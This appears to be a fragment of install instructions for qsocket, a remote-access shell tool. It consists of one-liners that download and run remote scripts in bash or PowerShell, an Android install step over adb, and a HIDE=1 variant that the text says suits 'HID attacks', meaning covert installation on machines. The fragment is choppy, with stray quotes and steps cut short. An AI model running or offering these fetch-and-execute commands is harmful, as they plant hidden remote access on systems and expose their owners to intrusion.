curl -fsSL qsocket.io/0 | bash"
irm qsocket.io/1 | iex
- Enable USB debugging on the android devive.
- Attach the android device to a linux host with adb installed.
- Run the following command on the linux host...
curl -fsSL qsocket.io/2 | bash"
S="MySecret" curl -fsSL qsocket.io/0 | bash # For *nix
$env:S="MySecret"; irm qsocket.io/1 | iex # For Windows
This option can be usefull during HID attacks.
HIDE=1 curl -fsSL qsocket.io/0 | bash # For \*nix
$env:HIDE=1; irm qsocket.io/1 | iex # For Windows